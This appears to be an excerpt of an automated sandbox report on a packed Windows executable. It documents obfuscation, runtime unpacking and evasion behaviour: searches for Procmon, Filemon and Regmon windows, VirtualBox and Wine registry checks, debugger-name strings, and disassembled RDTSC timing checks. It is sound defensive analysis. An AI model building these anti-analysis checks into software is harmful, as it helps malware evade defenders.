Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: kernel.appcore.dllJump to behavior
Source: BkB1ur7aFW.exeStatic file information: File size 4426752 > 1048576
Source: BkB1ur7aFW.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: BkB1ur7aFW.exeStatic PE information: Raw size of gjdrirkr is bigger than: 0x100000 < 0x1ac600

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeUnpacked PE file: 0.2.BkB1ur7aFW.exe.3f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gjdrirkr:EW;agpnebbv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gjdrirkr:EW;agpnebbv:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: BkB1ur7aFW.exeStatic PE information: real checksum: 0x443078 should be: 0x4396cc
Source: BkB1ur7aFW.exeStatic PE information: section name:
Source: BkB1ur7aFW.exeStatic PE information: section name: .idata
Source: BkB1ur7aFW.exeStatic PE information: section name:
Source: BkB1ur7aFW.exeStatic PE information: section name: gjdrirkr
Source: BkB1ur7aFW.exeStatic PE information: section name: agpnebbv
Source: BkB1ur7aFW.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_01789972 push esp; iretd 0_3_017899B9
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_0178FB68 push cs; ret 0_3_0178FB69
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_0178FB68 push cs; ret 0_3_0178FB69
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_01789B22 push cs; iretd 0_3_01789B69
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_0178B818 pushad ; retf 0_3_0178B819
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_0178BFF8 pushfd ; retf 0_3_0178BFF9
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_0178B298 push eax; ret 0_3_0178B299
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_0178F990 push ecx; ret 0_3_0178F991
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_0178F990 push ecx; ret 0_3_0178F991
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_0178B980 push ebx; retf 0_3_0178B981
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_0178FB68 push cs; ret 0_3_0178FB69
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_0178FB68 push cs; ret 0_3_0178FB69
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_01799561 push edx; retf 0_3_01799596
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_01799561 push edx; retf 0_3_01799596
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_01799561 push edx; retf 0_3_01799596
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_01798D10 push edx; retf 0_3_01798FE6
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_01798D10 push edx; retf 0_3_01798FE6
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_01798D10 push edx; retf 0_3_01798FE6
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_0179A9E6 push C297A2DCh; iretd 0_3_0179A9EB
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_0179A9E6 push C297A2DCh; iretd 0_3_0179A9EB
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_0179A9E6 push C297A2DCh; iretd 0_3_0179A9EB
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_017991D8 push edx; retf 0_3_01799216
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_017991D8 push edx; retf 0_3_01799216
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_017991D8 push edx; retf 0_3_01799216
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_017995A0 push edx; retf 0_3_0179996E
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_017995A0 push edx; retf 0_3_0179996E
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_017995A0 push edx; retf 0_3_0179996E
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_0178F990 push ecx; ret 0_3_0178F991
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_0178F990 push ecx; ret 0_3_0178F991
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_01797596 push eax; retf 0_3_01797597
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_01797596 push eax; retf 0_3_01797597
Source: BkB1ur7aFW.exeStatic PE information: section name: gjdrirkr entropy: 7.954844497774828

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeWindow searched: window name: RegmonclassJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
Source: BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
Source: BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
Source: BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C3657C second address: C36581 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C449F2 second address: C449FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jg 00007FD13CB4AEFCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C44DF8 second address: C44DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C44DFC second address: C44E16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AF06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C4510F second address: C4514D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063722h 0x00000007 jmp 00007FD13D06371Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD13D063726h 0x00000015 jnp 00007FD13D063716h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C4514D second address: C45169 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnc 00007FD13CB4AEF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push edi 0x0000000e jmp 00007FD13CB4AEFBh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C45169 second address: C45177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jne 00007FD13D063716h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C48C57 second address: C48C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C48C5B second address: C48C7A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD13D063718h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push ebx 0x0000000f pushad 0x00000010 jmp 00007FD13D06371Bh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C48C7A second address: C48C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD13CB4AF01h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C48C97 second address: C48C9D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C48C9D second address: C48D46 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD13CB4AEF8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jp 00007FD13CB4AF00h 0x00000014 pop eax 0x00000015 push 00000003h 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007FD13CB4AEF8h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 0000001Bh 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 adc dx, 2F7Eh 0x00000036 je 00007FD13CB4AEFBh 0x0000003c and di, D328h 0x00000041 push 00000000h 0x00000043 pushad 0x00000044 and dl, 00000048h 0x00000047 mov ebx, dword ptr [ebp+129C2B41h] 0x0000004d popad 0x0000004e push 00000003h 0x00000050 push 00000000h 0x00000052 push ecx 0x00000053 call 00007FD13CB4AEF8h 0x00000058 pop ecx 0x00000059 mov dword ptr [esp+04h], ecx 0x0000005d add dword ptr [esp+04h], 00000017h 0x00000065 inc ecx 0x00000066 push ecx 0x00000067 ret 0x00000068 pop ecx 0x00000069 ret 0x0000006a jmp 00007FD13CB4AF06h 0x0000006f push A78922BEh 0x00000074 push eax 0x00000075 push edx 0x00000076 push eax 0x00000077 push edx 0x00000078 jns 00007FD13CB4AEF6h 0x0000007e rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C48D46 second address: C48D57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D06371Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C48E47 second address: C48E51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FD13CB4AEF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C48E51 second address: C48E82 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD13D063716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push esi 0x00000014 pop esi 0x00000015 pop eax 0x00000016 popad 0x00000017 nop 0x00000018 xor ecx, dword ptr [ebp+129C1BA7h] 0x0000001e push 00000000h 0x00000020 mov si, dx 0x00000023 push E80A11BAh 0x00000028 jl 00007FD13D06371Eh 0x0000002e push ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C48F71 second address: C48F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C48F75 second address: C48F7F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD13D063716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C48F7F second address: C48F89 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD13CB4AEFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C4908C second address: C490B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jc 00007FD13D063735h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD13D063723h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C490B0 second address: C490B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C490B4 second address: C490E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 jmp 00007FD13D063729h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD13D06371Fh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C490E7 second address: C490EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C490EB second address: C490FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C490FC second address: C49100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C49100 second address: C4910E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D06371Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C69215 second address: C6921A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C3CF42 second address: C3CF46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C3CF46 second address: C3CF56 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 js 00007FD13CB4AEF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C3CF56 second address: C3CF5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C3CF5A second address: C3CF5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C6741E second address: C6742A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FD13D063716h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C5DE5A second address: C5DE72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AF04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C5DE72 second address: C5DE90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD13D06371Eh 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007FD13D063716h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C5DE90 second address: C5DE96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C5DE96 second address: C5DE9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C5DE9A second address: C5DE9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C68379 second address: C6837E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C68992 second address: C68999 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C68999 second address: C689A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FD13D063716h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C68C34 second address: C68C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C68C3A second address: C68C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FD13D06371Bh 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007FD13D063718h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C690B1 second address: C690B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C690B7 second address: C690C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jns 00007FD13D063716h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C69FEC second address: C69FF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C69FF2 second address: C69FF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C74B8B second address: C74B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e je 00007FD13CB4AEF6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C74B9F second address: C74BAA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C74E4E second address: C74E52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C74E52 second address: C74E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD13D063724h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007FD13D063720h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C74FF4 second address: C74FF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C74FF8 second address: C75004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD13D063716h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C75004 second address: C7501B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD13CB4AEFEh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C752CD second address: C752E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FD13D06371Ch 0x0000000b jmp 00007FD13D06371Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C77CB3 second address: C77CB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C77CB7 second address: C77CD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 24B21F30h 0x0000000e sub esi, 1296B862h 0x00000014 push F36B937Bh 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push edi 0x0000001e pop edi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C77CD6 second address: C77CDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C77DC9 second address: C77DD6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C77F61 second address: C77F68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C7882F second address: C78833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C78833 second address: C78842 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD13CB4AEF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C78ADD second address: C78AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FD13D063716h 0x0000000d rdtsc
